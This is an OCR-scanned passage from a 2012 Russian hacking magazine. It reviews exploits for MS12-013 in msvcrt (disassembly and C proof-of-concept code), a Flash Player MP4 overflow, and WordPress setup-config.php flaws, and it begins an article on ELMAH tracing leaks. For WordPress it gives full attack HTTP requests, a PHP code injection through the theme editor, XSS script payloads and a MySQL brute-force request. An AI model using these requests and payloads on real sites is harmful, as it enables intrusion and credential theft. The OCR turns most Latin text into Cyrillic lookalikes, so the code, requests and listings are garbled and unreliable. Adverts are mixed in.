создавать новые учетные записи с неограниченными правами. 
Риск для пользователей, учетные записи которых имеют огра- 
ниченные права, меньше, чем для пользователей, работающих с 
правами администратора. 



ЕХРЮІТ 



Патч от М5 затрагивает функцию сбеск_ЛоаІ_5Ігіпд(). В связи 

с тем, что библиотека времени выполнения С поставляется в 
виде исходников совместно с М5 ѴізиаІ Віисііо, посмотреть на 
вышеупомянутую функцию можно в ѴС/СРТ/згс/іприПс. 

Логика работы у функции сЬеск_і : І оаІ_5І:гіп д () следующая. 

С самого начала у библиотеки времени выполнения имеется 
буфер статического размера (_ТСНАК Л оа1:5І:п±п§ [_СѴТВІ)Р5І2Е 
+ 1];). Как только требуется буфер большего размера, проис- 
ходит перераспределение памяти. Порядок подобного пере- 
распределения таков: выделяется удвоенный размер буфера и 
удваивается значение переменной, содержащей этот размер. 
При первой итерации увеличения используется вызов функции 
саІІосП, далее используется гесаІІосО. Основной момент, в связи 
с которым имеет место быть МБ12-013, состоит в попытке записи 
нового размера буфера. 

Ниже приведен дизасм-листинг старой версии тзѵсгЕсІІІ: 



. іехі: :бРРВЕА2б рор есх 

.1:ех1::_6РРВЕА27 рор есх 

. Ііе хі: : 6Р РВЕА28 тоѵ [есіі], еах 

.Іі ехі: :6Р РВЕА2А Ііезі: еах, еах 

. і ехЦбР Р В ЕА2С І 2 збогі: Іо с 6 Р Р В Е А1 А 

. Ііехі: : 6РРВЕА2Е ризб [еЬр+риІКезиІІ:] ; зіге 1: 

. Ііехі: : 6РРВЕА31 тоѵ еах. [еЬр+аг§_8] 

. Ііехі: :6РРВЕА34 ризИ [еЬр+аг^ 4] ; ѵоісі * 
.1:ех1=:6РРВЕА37 тоѵ сішгсі рііг [еах], 1 
. 1=е х1= : 6Р РВЕАЗР ризб сіыопсі р1іг_[есІі] : ѵоісі * 
.1=ех1=:бРРВЕАЗР саіі тетсру 



.1=ех1=:6РРВЕА44 тоѵ еах. [е5І] 

.1:ех1::6РРВЕА46 ризб езі ; риІКезиІІ: 

. Ііехі: :6РРВЕА47 асісі еах, еах ; ! ! ! ! 

.Ііехі: :6РРВЕА49 ризб 2 ; іп1= 

.1іе х1і:6Р РВЕА4В ризб еах ; іпі: 

.1і ех1і:6Р РВЕА4С тоѵ [езі], еах 
.Ііехі: :6РРВЕА4Е саіі ?$І2еТМи11Кя)(д)УАЗІІРАІ(я)2 
; БігеТМиГЕГиіп'С.иіп'С.иіпІ: *) 



.1іех1і:6РРВЕА53 асісі езр, 186 

. Ііе хі: : 6Р РВЕА56 Ііезі: еах, еах 

.І іехі: : 6Р РВЕА58 д§е збогі: 1ос_6РРВЕА78 

Обрати внимание на аргументы функций саІІос_сгі() и 

5 і 2 еТ М и И: ( ) . В момент вызова саІІос_сгі(] мы имеем следующий 

набор аргументов: са 1 1 ос_сг1;(5іге, 2]. Однако в момент, когда 

для записи переменной размера вызывается функция БігеТМиб, 
ее набор аргументов выглядиттак: 

$І2еТМи11і($І2е*2. 2. &рКези11і) 

Посему, несмотря на реальный размер выделенной памяти 
под буфер в 5іге*2, в переменную размера сохраняется значение 
5іге*2*2. В связи с этим переполнение кучи происходить будет, 
но - за пределами рассматриваемой функции. 

А это пропатченная версия. Вновь посмотрим на аргументы 
5 і 2 еТ М и И: ( ) . В этот раз имеем 5І2еТМи1і(5І2е, 2, &рКези1і). В 
итоге М5 пришлось избавиться от инструкции «асісі еах, еах»: 



ЛехіібРРВЕАІЕ ІосбРРВЕАІЕ : ^_ОЮЕ ХКЕР: з иЬ_6РРВЕ9 РЗ+25 1 д 
.1іех1і:6РРВЕА1Е ризб 2 




сНеск_ЛоаІ_зІгіпд изСРТ 



.1іех1і:6РРВР935 ризб [еЬр+риІКезиІІі] ; зіге і: 

. Ііехі: : 6РРВР938 тоѵ еах. [еЬр+аг^ 8] 

. Ііехі: : 6РРВР93В ризб [еЬр+аг^ 4] ; ѵоісі * 
.1іех1і:6РРВР93Е тоѵ сіыогсі рііг [еах]. 1 
.1іех1і:6РРВР944 ризб сімогсі рііг [езі] ; ѵоісі * 
.1іех1і:6РРВР946 саіі _тетсру 
.іе х1і:6Р РВР94В ризб есіі ; риІКезиІІ: 
. іех1і:6Р РВР94С ризб 2 ; іпі 
.1іех1і:бРРВР94Е ризб сіыогсі рііп [есіі] ; іпі: 
.іехі:6РРВР95Ѳ саіі ?$І2еТМи1і:даУАЗІІРАІ(д)2 

; ЗігеТМиІІіСиіпІі.иіпІі.иіпІі *) 

. Ііехі: :6РРВР955 асісі езр, 186 

РОС для М512-013: 

#іпс!ис!е <ыіпсІоыз.б> 

#іпс!ис!е < 5ІісІ іо . б> 



#ргашпа соттеп1I(1іпкег,_^/NО^ЕРА^^Т^IВ:т5ѵсг1I90.1іЬ ,, ) 
#рга%та соттеп1і(1іпкег, ,, /NО^ЕРА^^Т^IВ:т5ѵсг1I80.1іЬ ,, ) 



#рга^та соттепІіСІіЬ. "ѵзб/тзѵсгі.ІіЬ") 
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ВЗЛОМ/ОБЗОР ЭКСПЛОИТОВ 



#сІеЯп€ ВІІР_5І2Е 0x300 



ѵоісі шаіп( ѵоісі ^ 

сііаг * р51:г; 

Поаі: -Р ; 
іпі: і; 



р$1=п = (сбаг*)та11ос(ВІ)Р 5І2ЕѴ, 
тетзе1 : (р51: г . 0, В ЦР5І2ЕѴ . 
5І:гср у( р$1=п, "1."); 



-Ро г( і=1; А<=ВІІР_5І2Е-10;^.++) 
з1:гса1:(р51:г. "0"); 



р гіггЕ-РГ'Ве-Роге зсап-Р()\п"); 



55сагѵР(р$1=г. "%-Р" . &-Р); 



АсІоЬе РІазИ РІауег: переполнение буфера при 
обработке МР4 в 



5едиепсеРагате1ег5еЖАИІпі1 



СѴ55Ѵ2 



(АѴ:М/АШАи:М/С:С/І:С/А:С) 

МгЛЗД 

10 февраля 2012 года в составе теіазріоіі-а появился новый модуль, 
отвечающий за уязвимость в обработке тр4-файлов, которая осу- 
ществляется компонентом РІазЫОи.осх АсІоЬе РІазЬ РІауег. Ошибка 
располагается в зециепсеРагате^егЗеШАШтС Когда происходит 
обработка значения пит_геНтатез_іп_ріс_огсІег_спІ_сусІе, раз- 
мер копируемых да иных ни как не проверяется, и процесс РІазЬ'а 
бездумно копирует под контрольные пользователю данные из 
оИзеЫоГ-ГеНтате в буфер фиксированного размера, располагаю- 
щийся на стеке. В результате это при водит к удаленному выполне- 
нию произвольного кода в контексте пользователя, запустившего 
процесс РІазЬ-а. Многочисленные сообщения об этой уязвимости 
также указывают на то, что она активно использовалась ІТѴѴ. 



ргігтЕ-РСА-Рііег 5сагѵР()\п") : 



ргіп1:-Р("%'Р\п" . -И ; 



ТАР6ЕТ5 



ѴѴіпсІоѵѵз Ѵізіа, ѴѴіпсІоѵѵз Зегѵег 2008, ѴѴіпсІоѵѵз 7, ѴѴіпсІоѵѵз Бегѵег 2008 



зонтом 



Существует обновление, устраняющее данную уязвимость 



ЕХРЮІТ 



Дизасм уязвимого места (функция зиЬ І 005В396), РІазЫОи.осх 
10.3.181.34: 

.1:е х1:: 1ѲѲ5В482 саіі 5иЬКеас111ЕхрС1отЬ 

; читаем ріс огсіег спі: 1=ѵре 

. іехі: : 1ѲѲ5В487 тоѵ [езі+4ѲІі] . еах 

.1=ех1::1005В48А стр еах. еЬр 

; если ріс огсіег спіі ііѵре != 0 (еЬр=Ѳ) 

. 1:ех^: 1005В48С іпг 5 Ног* 1ос_1005В49О 




тз12-013: результатпереполнения кучи 
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Обзор эксплоитов 



.■Еех*:1005В49О 


хог 


еЬх, еЬх 


.■Еех*:1005В49Р 


іпс 


еЬх 


.■Еех*:1005В4А0 


стр 


еах, еЬх 


.■Еех*:1005В4А2 


ІП2 


зііогі Іос 1005В4ЕР 


: если ріс огсіег спі: 1:уре != 1 


.■Еех*:1005В4А4 


тоѵ 


есх, есіі 


.1:ех1::1Ѳ05В4А6 


саіі 


БиЬКеасІВіі 


: читаем сІе11:а ріс 


огсіег аіыаѵз іего Ріае 


.іехі : 1005В4АВ 


тоѵ 


есх, есіі 


.іехі : 1005В4АО 


тоѵ 


[езі+48И]. аі 


.іехі : 1005В4В0 


саіі 


БиЬКеасІБЕхрСІотЬ 


: читаем о-РізеІ: -Рог 


поп ге-Р ріс 


.іехі : 1005В4В5 


тоѵ 


есх, есіі 


.іехі : 1005В4В7 


тоѵ 


[езі+541і], еах 


.іехі : 1005В4ВА 


саіі 


БиЬКеасІБЕхрбІотЬ 


: читаем оі-РзеІ: -Рог 


попге-Рріс 


.іехі::1005В4ВР 


тоѵ 


есх, есіі 


.іехі:1005В4С1 


тоѵ 


[езі+501і], еах 


.іехі : 1005В4С4 


саіі 


БиЬКеасІІІЕхрСІотЬ 


: читаем пит ге-Р -Ргатез іп ріс огсіег спі сѵсіе 


.іехі:1005В4С9 


тоѵ 


[езі+4СІі], еах 


.іехі:1005В4СС 


іезі 


еах, еах 


.іехі:1005В4СЕ 


ІЬе 


зііогі Іос 1005В4ЕР 


: если пит ге~Р -Ргатез іп ріс огсіег спі сѵсіе == 0 


.іехі:10Ѳ5В4РѲ 


Іеа 


еах,_Еезі+58Іі] 


.іехі:1005В4РЗ 


тоѵ 


Гезр+101і+ріг1 . еах 


.іехі:1005В4Р7 


.іехі:10Ѳ5В4Р7 


Іос 1005В4Р7 : 


; СОРЕ ХКЕР : 


: БиЬРагзеБедРагатеіегБеі+157 1 д* 


.іехі:1005В4Р7 


тоѵ 


есх, есіі 


.іехі:1005В4Р9 


саіі 


БиЬКеасІБЕхрСІотЬ 


: читаем о-р-Рзеі -Рог 


ге-Р -Ргате 


.іехі:1005В4РЕ 


тоѵ 


есх, ^езр+101і+ріг] 


.іехі:1005В4Е2 


асісі 


[езр+101і+ріг] , 4 


.іехі : 1005В4Е7 


іпс 


еЬр ; еЬр - счетчик цикла 


.іехі : 1005В4Е8 


тоѵ 


Гесхі, еах 


: есх указывает на буфер на стеке 


.іехі:1005В4ЕА 


стр 


еЬр, Гезі+4СІі1 сравниваем счетчик 


: с пит пеі 


■Ргатез іп ріс огсіег спі сѵсіе 


.іехі:1005В4ЕР 


ІЬ 


зііогі Іос 1005В4Р7 



Функция БиЬРеасІ II ЕхрСІотЬО читает из файла экспоненци- 
альный код Гол омба и декодирует его в беззнаковое число. 
БиЬРеасІБЕхрЗІотЬИ читаетэкспоненциальный код Голомба и деко- 
дирует его в знаковое число. Функция БиЬРеасІВіШ производит чтение 
одного бита. Как видишь, в вышеприведенном коде не производится 
ни каких проверок на значение пит_геНтатез_іп_ріс_огсІег_спІ_ 
сусіе. Вдобавок ко всему РІазЬ РІауегне используеттакой защитный 
механизм какзіасксоокіез, поэтомуатакующий можетполучить 
контроль над регистром еірбез каких-либо проблем. 



ТАК6ЕТ5 



АбоЬе РІазЬ РІауег<= 10.3.181.36 



50ШТІ0Ы 



Обновитьсядоверсии 10.3.183.5 



3 



Множественные уязвимости в ѴѴогсІРге55 



СѴ55Ѵ2 



7.5 



(АѴ:М/АС:І_/Аи:М/С:Р/І:Р/А:Р) 

В конце января компания Тгизіѵѵаѵе 5рісІегІ_аЬ5 в 
лице исследователя Джонатана Клаудиуса ропаіЬап 



149 -;7рМр 

150 Ьгеак; 

т 

152 с яг е 2 х 

353 ІсНіпвае а ігі*(}_Р05Т[ ‘«Воаде ' ] \ \ 

] 54 3 1 татр » | г 1в( РЙ5-Т | р ипяы? ’ 1 3 Г 

ш Тп-{$ Р65Т| '[илі г ЁЗ ; 

3 % | ііъкоь 1 =» И } Я|( $ Р05Т і ь ЙЬіі и * И 1 ] Ъ ; 

15/ ЗРгеІіа * ІгІіМ* Р05ТІ ‘рісгііл 1 1 і; 

15В Іі ( егтщ I ѵ I 5 і_і г ы 1 ід ] 3 

159 іргеііх ■* к нр ■ ; 

166 

161 // ѵаіііШй и сап шіу сипіліі ІеіТйгь, іил 

гЬе-іь аікі іякіи : гсоі йБ 

162 іі { рг*д_тлісВ( ' |[ л й-гв-9 (]1‘, Іргеііх ) ) 

163 мр_В1&( / 4 и Р ІІІН 

гопо>: *Табіе Ргети" сап сип у еопізіп питьег*. іеііег*. 
опв ипйбг&еотс/ѵнр нам вас ряерілѵ з; 

164 

ІИ // Тел Ійе ВЬ сопггесііш. 

160 

167 * ^ідпоге 

16В Ч 

169 Вс ! тс [ я Ш КАМЕ 1 , ІЙЬ папе ) ; 

1 ѵ ѳ ас т икс [ ' т Ш5і н ' „ %иптч ] г 

171 ас тіпс | ' 00 ѵьъътт ' , і разіз мгй > ; 

1 72 ае т іпе I ' ш ^05і 1 , да па я з ; 

173 /**#*»ѵ 

174 

1 7Ь 3* Н-р'іі Іт [ И«*ге ІІ I Ні? ѵяіиез аге сш допгі. 

] 76 Г Еф.І І ГС? 'імр а Ы ) і 

177 іі ( ! сшрѣу( %ыр(ІЬ->ЕГ гаг Э 3 { 

178 5-Ьлск = "-^р сія н,-я— *" а і рр'^-ік НгЕТ^ьеСир -соп Г і д . рі 
Ир? 5 Іер *1 “ □ пс 1 1 ск.= “ ілуа-цгг крі: : И 1. 5 ( о-гу .. д-л { - 1 ) : геі игп Глі 
г-р ; " с 1 я 5-г = " Ьц 1 1 он" >Тг у Ддл к п< / я^ /р-ь 4 - 

179 ыр_сіійі 5и’рЛЬ-^ггОіГ->^йТ_еггйг_ті?л-5й^й [] . ^Ьлс 

ь ]; 

18В > 

181 

175,2-5 61^ 



Параметры, принимаемые скриптом 5еІир-сопПд.рИр, никак не фильтруются 



СІаибіиз) опубликовала очередную пачку уязвимостей в движке 
ѴѴогбРгезз. Среди них - исполнение произвольного РНР-кода, 
множественные Х55-уязви мости, а также раскрытие имени поль- 
зователя и пароля для подключения к серверу Му БОЕ. 



ЕХРЮІТ 



1. Исполнение произвольного РНР-кода и хранимая Х55 в скрипте 
зеІир-сопНд.рЬр. Сценарий исполняется в процессе инсталляции 
ѴѴогбРгезз и позволяет уста на вливать движок с использованием ло- 
кальной или удаленной базы данных МуБОЬ. Для этого необходимо 
располагать валидными реквизитами для доступа к МуБОЬ. Однако 
злоумышленник может поднять свой собственный сервер МуБОЬ 
и использовать его в процессе установки, при этом не располагая 
логином/паролем к МуБОЬ на целевой системе. После успешной ин- 
сталляции ѴѴогбРгезз злоумышленник может внедрить произволь- 
ный РНР-код через редактортем ѴѴогбРгезз. В дополнение кэтому, 
благодаря доступу к базе да иных ѴѴогсІРгезз становится возможным 
в нед рить п роизвол ьны й Іаѵазсгірі- код в контент движка, тем самым 
реа л изуя уязви мость храни мой Х55. 

Атака проводится следующим образом. Допустим, А. В. С. й - целевой 
сервер с ѴѴогсІРгезз, а ѴѴ.Х.Ѵ.2 - сервер злоумышлен ника с установ- 
ленной МуБСИ. 

Посылаем Р05Т- и СЕТ-запросы дляустановки ѴѴогсІРгезз с исполь- 
зованием базы да иных злоумышлен ника: 

Р05Т-запрос 

Р05Т /ыр-ас!тіп/5е1=ир-сопб^.рІір?5І=ер=2 НТТР/1.1 
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ВЗЛОМ/ОБЗОР ЭКСПЛОИТОВ 



Нозі: А.В.С.й 

БІзег-А^епі; МогіІІа/5.0 (Масіпіозіі ; Іпіеі Мае 05 X 10.6; 
гѵ:8.0.1) Сеско/20100101 Рігеіох/8.0.1 
Ассері : Ііехіі/Іпііті . арріісаііоп/хіііті+хті . 

арріісаііоп/хті; д=0 . 9 3 */* ; д=0 . 8 
Ассері-Бап§иа% е: еп-из.еп;д=0.5 
Ассері-ЕпсосІіп§: §іір, сіеіаіе 
Ассері-СІіагБеі : 150-8859-1. иіі-8 ;д=Ѳ. 7, *;д=0. 7 
Ргоху-Соппесііоп : кеер-аііѵе 

Кеіегег; Нііді //А. В.С.Р/ ыр-асІтіп/5е1:ир-соп1і§ . рбр?5іер=1 

Соокіе : мр-зеіііп§з-ііте- 1=1322687480; 

мр-зеіііп§з-1=т9%30о 

Сопіепі-Туре : арр1ісаііоп/х-млЛл/-іогт-иг1епсосІесІ 
Сопіеп і-Ееп^ііі : 81 



с ІЬпате=ыог сІ рге5 5&ипате=Э5ті1:Іі&рысІ=Э5ті 1:Іі &сІЫіо5І:=1лІ.Х.У. 2 
8фгеіх=мр_&5иЬтіі=5иЬтіі 

СЕТ-запрос 

СЕТ /мр-асітіп/іпзіаіі . рРір НТТР/1.1 
Нозі: А.В.С.й 

Б)зег-А§епі; МогіІІа/5.0 (Масіпіозіі: Іпіеі Мае 0$ X 
10.6; гѵ;8.0.1) Сеско/20100101 Рігеіох/8.0.1 
Ассері: : 1:ех1:/И1:т1 , арріісаііоп/хіііті+хті , 
арріісаііоп/хті ;д =0.9 . * /* ; д=Ѳ. 8 
Ассері-Бап§иа§е: еп-из., еп; д=0. 5 
Ассері- Епсогііп§: ^гір. сіеіаіе 
Ассері-СІіагзеі : 150-8859-1. иіі-8 ;д=Ѳ. 7. *;д=0. 7 
Ргоху-Соппесііоп; кеер-аііѵе 

Кеіегег : Іііір : //А. В . С . О/мр-асІтіп/зеіир-сопі^. рМр ? з1:ер=2 
Соокіе : мр-зеіііп§з-ііте- 1=1322687480; 
мр-зеіііп§з-1=т9%30о 

Іі-МосІііесІ-5іпсе: ІлІесІ. 07 Рес 2011 16:03:33 СМТ 

С помощью редактора тем ѴѴогсІРгеББ редактируем файл 404. р И р 
(или любой другой, доступный в используемой теме), тем самым 
реализуя возможность исполнения РНР-кода: 

< ?рМр 
рбріпіо( ) ; 

?> 

Исполняем код с помощью СЕТ-запроса или просто открыв стра- 
ницу в браузере: 

СЕТ /мр-сопіепі/іІіете5/сІеіаи1і/404. рИр НТТР/1.1 
Нозі: А.В.С.Э 

Б)зег-А§епі: МогіІІа/5.0 (Масіпіозіі: ІгѵБеІ Мае 0$ X 
10.6і_гѵ:8.0.1) беско/20100101 Рігеіох/8.0.1 

Также злоумышленник может использовать хранимую Х55 для 
атаки на пользователей, — для этого необходимо выполнить 
такой запрос: 

БІРйАТЕ мр_соттепіз 5ЕТ 

соттепі_сопіепі=Чзсгірі>а1егі(/Д23 ' )</зсгірі> 1 мбеге 
соттеп і_сопіепі= ' Ні . ііііз іб а соттепі.<Ьг />То сіеіеіе 
а соттегтБ. іизі Іод іп апсі ѵіем іііе розі&#039; з 
соттепіз. ТНеге уои ыііі Иаѵе 1:Ие орііоп іо есііі 
ог сіеіеіе ібет . ' ; 

Когда пользовательзайдетпоссылке, указанной вследующем СЕТ- 
запросе, в его браузере выполнится внедренный Эаѵазсгірі-код: 

СЕТ /?р=1 НТТР/1.1 
Нозі: А.В.С.й 

Б)зег-А§епі: МогіІІа/5.0 (МасіігБозІі; ІгѵБеІ Мае 0$ X 



10.6; гѵ : 8. 0.1) Сеско/20100101 Рігеіох/8.0.1 

2. Множественные Х55 в скрипте зеіир-сопіід.рМр. В процессе ин- 
сталляции злоумышленник может внедрить Эаѵазсгірі-код через 
параметры «бЬпате», «сіЫіозі» или «ипате». Это реализуется 
через следующий РОБТ-запрос: 

Р05Т /ыр-асІтіп/5еіир-сопі|Е;. р!ір?зіер=2 НТТР/1.1 
Нозі: А.В.С.Р 

Б)зег-А%епі: МогіІІа/5.0 (МасіігБозІі; ІгѵБеІ Мае 05 X 
10.6і_гѵ:8.0.1) Сеско/20100101 РігеТох/8 . 0. 1 
Ассері : іехі/біті і арріісаііоп/хіііті+хті, 
арр1ісаііоп/хт1;д=0.9., */*;д=0. 8 
Ассері- Бап^иа^е: еп-иБ.еп;д=0.5 
Ассері- Епсогііп§: ^гі р. сіеіаіе 
Ассері-СІіагзеі: 150-8859-1. иіі-8 ;д=Ѳ. 7. *;д=0. 7 
Ргоху-Соппесііоп : кеер-аііѵе 

Кеіегег : Іііір : / /А. В. С . 0/мр-асІтіп/5еіир-сопі§. рМр ? зіер=1 
Сопіепі-Туре : арріісаііоп/х-млм-іогт-игіепсосіесі 
Сопіепі-Беп§іІі : 112 



сІЬпате=%ЗС5СГІрі%ЗЕа1егі%28%27123%27%29%ЗС%2Р5СГІрі%ЗЕ& 

ипате=гооі&рысІ=&сІЫіо5і=1оса1Ііо5і&ргебх=ыр_&5иЬтіі=5иЬтіі 

3. Раскрытие реквизитов для доступа к базе данных МуБСіЕ через 
скрипт зеІир-сопНд.рІір. В процессе инсталляции пользователь 
задает параметры базы данных Му5(ЭІ_, как уже обсуждалось 
ранее. При вводе неправильных реквизитов скрипт выдает ошиб- 
ку, чем и можно воспользоваться, осуществляя брутфорс имени 
пользователя и пароля к МуБСіЕ, причем не только локальной, ной 
любой удаленной. Запрос выглядит следующим образом: 

Р05Т /ыр-асІшіп/Беіир-сопб^. р!ір?5іер=2 НТТР/1.1 
Нобі : А.В.С.Р 

Б)зег-А%епі: МогіІІа/5.0 (Масіпіозіі; Іпіеі Мае 05 X 
10.6; гѵ ; 8. 0.1) Сеско/20100101 Рігеіох/8.0.1 
Ассері : іехі/біті і арріісаііоп/хіііті+хті , 
арр1ісаііоп/хт1;д=0.9 л */^;д=0. 8 
Ассері-Бап§иа§е: еп-из„ еп; д=0. 5 
Ассері-Епсойіп§: ^гі р. сіеіаіе 
Ассері-СІіагзеі: 150-8859-1. иіі-8 ;д=0. 7. *;д=0. 7 
Ргоху-Соппесііоп; кеер-аііѵе 

Кеіегег : Іііір : //А. В. С . Р/ыр-асІтіп/5еіир-сопі§. рМр ? зіер=1 
Сопіепі-Туре : арріісаііоп/х-ммм-іогт-игіепсосіесі 
Сопіепі-Бе п^ііі : 32 



ипате=изег&ріл/с!=ра5 5&сІЫі05і=Б ,М. ІМ.О 

В нем делается попытка коннекта к серверу Б. М.І\І. О пользовате- 
лем изег и паролем разз. 



ТАК6ЕТ5 



ѴѴогсІРгезз 3.3.1 и более ранние. 



Боилкж 



Таккакуязвимый скрипт - инсталляционный, разработчики 
ѴѴогсІРгезз посчитали возможность реализации этих уязвимостей 
крайне малой и не стали выпускать официальных патчей. «Ни один 
нормальный пользователь не будет оставлять инсталляционных 
скриптов у себя на сервере или прерывать процесс установки», - 
считаютони. Однако некоторыехостинговые компании предостав- 
ляютаккаунты, в которых поумолчанию присутствуютдистрибутивы 
ѴѴогсІРгезз с установочными скриптами, а клиент их может даже и не 
планировал использовать. Длязащиты своихсерверовотэтихатак 
можно порекомендовать л ишь пользоваться сложными паролями к 
МуБОБ, атакже использоватьѴѴАР, например, МосІБесигіІу, в правилах 
которогоучтены подобного рода атаки. ИГ 



054 



ХАКЕР 04/159/2012 





на правах рекламы 










Оформить дебетовую или кредитную «Мужскую каргу» 
можно и а сайте ѵтѵѵ.аІГаЬапк ги или нотис кин 
по телефонам: 

(495) 229 2222 в Москве 

8-800-333-2-333 в регионах России (звонок бесплатный) 



А Альфа Банк (дЗШв)ІЗПб 



АВауКи 



віасквеггу 



С ПО АПРЕЛЯ 

СТАНЬ ОБЛАДАТЕЛЕМ 
ОДНОГО ИЗ ТРЕХ СМАРТФОНОВ 

Вьасквекку Вою 9700 



подробности на сайте 

ѵѵѵѵѵѵ.тапсагсі.ги 




ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от 29.01.1998 №1326" 





взлом 



Илья Вербицкий (Ыод.сЫѵаѵаз.огд) 




ТЕМНАЯ СТОРОНА 
ТРАССИРОВКИ 



ОѴй 

На нашем диске 
ты найдешь 
исходникуязвимого 
приложения Мизіс 
51оге 



V 1/ 



ЭКСПЛУАТИРУЕМ СИСТЕМУ РЕГИСТРАЦИИ 
И МОНИТОРИНГА ИСКЛЮЧЕНИЙ ЕІ.МАН 



Одним из инструментов, применяемых для 
поиска и исправления ошибок в программах, 
являются отладчики и трассировщики 
— специальные утилиты, выполняющие 
программу по шагам, чтобы понять, что вообще 
происходит. Сегодня речь пойдет о взломе ЕІ_- 
МАН — популярного средства для трассировки 
АЗР.ЫЕТ-приложений. 




ѴѴеЬ-интерфейс лога ЕІ.МАН 



НЕМНОГО ОБ ОТЛАДЧИКАХ 



Использование отладчика — это гарантия того, что ошибка будет 
как минимум обнаружена и, если повезет, исправлена. Но, к со- 
жалению, существует множество ситуаций, когда программист не 
может прибегнуть к помощи этого мощного средства. Во-первых, 
не все ошибки можно отладить. Классический пример — тупико- 
вые ситуации (сіеасііоск) в многопоточном приложении: запускаешь 
приложение в отладчике — все работает, без него — программа 
«падает». Во-вторых, отладчик не всегда доступен. Например, тебе 
никто не разрешитустанавливать средства разработки на сервере 
высоконагруженного ѵѵеЬ-приложения. Или другой пример: я уве- 
рен на 99%, что ты не найдешь отладчик на компьютере бухгалтера 
Мариванны, которая использует твою «складскую» программу. Тут 
встает резонный вопрос: а что делать-то? Ответ нашли еще на заре 
появления компьютерной техники: трассировка — это получение 
информационных сообщений во время выполнения программы: 
какие были исключения, что ввел пользователь, чем программа 
занимается в данный момент и так далее. Средства трассировки 
приложений — это очень мощные, но в то же время и потенци- 
ально опасные инструменты, ведь они могут предоставить много 
полезной информации для хакеров. Такие «ошибки» особенно 
широко распространены в корпоративном софте, который пишется 
для внутренних нужд компаний. Программисты в корпорациях 
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А5Р.ЫЕТ: темная сторона трассировки 



'■■І'ЯЯВ- 




СТАРАЯ УЯЗВИМОСТЬ 



ЕІ_МАН — это далеко не первый пример, 
когда средство, предназначенное для 
облегчения жизни разработчиков, позволяло 
злоумышленникам получать доступ 
к системной информации. В 2007 году была 
зарегистрирована похожая уязвимость 
в системе трассировки ѵѵеЬ-приложений, 
идущей в поставке АБР.ІЧЕТ. ѴѴеЬ-страница 
Тгасе.ахсі, как и ЕІ_АМН, предоставляла 
слишком много информации в открытом 
доступе. Этот факт позволял хакерам легко 
и просто угонять сессии авторизованных 
пользователей. Дополнительная информация 
об уязвимости доступна на сайте Ра рісі7. 



Как видишь, на странице поиска альбома возможна БОЬинъекция 



стараются сделать жизнь службы поддержки (да, собственно, 
и свою) как можно проще, поэтому чаще всего доступ к различ- 
ным системным сообщениям и трассировке неограничен. Зачем 
усложнять систему, когда доступ извне защищают бравые парни из 
службы безопасности? А об инсайдерах, как обычно, забыли, хотя, 
если верить статистике, 80% успешных взломов корпоративных 
систем производится именно ими. 



ЧТО ТАКОЕ ЕІ.МАН? 



ЕІ.МАН (расшифровывается как Еггог І_оддіпд Мосіиіез апсі 
НапсІІегз) — это продукт с открытым исходным кодом, разработан- 
ный Атифом Азизом (АШ А 2 І 2 ). Данная система облегчает задачу 
регистрации и мониторинга необработанных исключений в при- 
ложениях, разработанных на А5Р.ІЧЕТ. Несмотря на свою молодость 
(ЕІ.МАН 1.1 был зарегистрирован в репозитории ІМибе1 11 января 
2011 года), проект очень популярен в среде разработчиков сайтов 
под .ІЧЕТ. На момент написания статьи он находился на четырнад- 
цатой строчке среди пакетов, доступных в ІЧиСеІ, а библиотеку 
скачали 45 583 человека. 

Секрет популярности ЕІМАН кроется в его простоте. Интегра- 
ция с любым ѵѵеЬ-приложением происходит при помощи всего 
нескольких щелчков мышки: добавляешь библиотеку в проект при 
помощи ІМибеІ и готово! Кроме того, если ты захочешь использо- 
вать ЕІМАН с уже существующим кодом, то тебе не потребуется 
заново его компилировать! Просто скопируй необходимые сборки 
в проект и подправь ѴѴеЬ.сопЛд. Все заработает на ура. Несмотря на 
простоту использования, ЕІ.МАН обладает богатым функционалом: 
здесь присутствует возможность сохранения информации об ошиб- 
ках в различные базы данных, существуют сервисы уведомления 
разработчиков по электронной почте или через Р55 и так далее. 




Угоняем сессию пользователя 



Теперь давай перейдем от слов кделу. В качестве примера 
я решил использовать учебное ѵѵеЬ- приложение А5Р.ІЧЕТ МѴС 
Мизіс Біоге, которое ты сможешь найти на нашем диске. Также 
оно доступно в интернете на сайте СосІеРІех, но уже без инте- 
грации с ЕІМАН, так что в этом случае я рекомендую обратиться 
к официальному сайту проекта для получения дополнительной 
информации. Ты можешь запускать данное ѵѵеЬ-приложение не- 
посредственно из ѴізиаІ Зіисііо или зарегистрировать его в 115. Я 
буду использовать второй вариант и создам новое приложение, 
доступное по адресу Ьир://ІосаІЬо5І/Мизіс5іоге. 



НЕМНОГО ТЕОРИИ 



Для начала давай посмотрим, что же интересного можно найти 
в отчете об обычном исключении в ЕІМАН. Открой Мизіс 5іоге 
и войди в магазин как администратор, воспользовавшись ссыл- 
кой Асітіп в правом верхнем углу страницы. Имя пользователя 
и пароль по умолчанию асітіп и рЙззѵѵОгсІ соответственно. Теперь 
давай сгенерируем какое-нибудь исключение. Наш сайт основан 
на А5Р.ІМЕТ МѴС, так что проще всего запросить несуществующую 
страницу, так как ошибка 404, конечно же, сгенерирует исключе- 
ние. Получилось? Отлично. Теперь можно посмотреть, какую же 
информацию мы сможем вытянуть. Для этого открывай ѵѵеЬ- 
интерфейс ЕІ.МАН, который доступен по адресу Нир://ІосаІЬозі/ 
МизісЗіоге/еІтаН.ахсІ. Как видишь, последняя исключительная 
ситуация, зарегистрированная ЕІМАН, это ошибка 404, которую мы 
сами только что воспроизвели. Дальше давай посмотрим, что же 
именно записал ЕІМАН. Нажми на ссылку Оеіаііз и внимательно 
посмотри на логи. Во-первых, ЕІМАН сохраняет как можно больше 
информации об исключении: его тип, сообщение об ошибке и стек 
вызовов. Что все это может дать злоумышленнику? Многое. Очень 
часто сообщение об ошибке содержит не предназначенную для 
посторонних глаз системную информацию, например информа- 
цию о соединении с базой данных (включая имя пользователя 
и пароль), информацию о состоянии объекта, в котором произошла 
ошибка, и многое другое. Если ошибка произошла в коде интернет- 
магазина, то там могут оказаться и данные кредитной карты поль- 
зователя! На мой взгляд, стек вызовов не может принести столько 
вреда, сколько текст сообщения об ошибке, но я не думаю, что ты 
захочешь раскрывать злоумышленнику какую-либо информацию 
об устройстве твоего приложения. Также стоит отметить, что со- 
общения об ошибках в логах ЕІМАН никак не связаны с параме- 
тром сизІотЕггогз в А5Р.ІЧЕТ, который используется для сокрытия 
чувствительной информации от пользователя ѵѵеЬ-приложения. Ты 
можешь скрыть от пользователя информацию о необработанном 
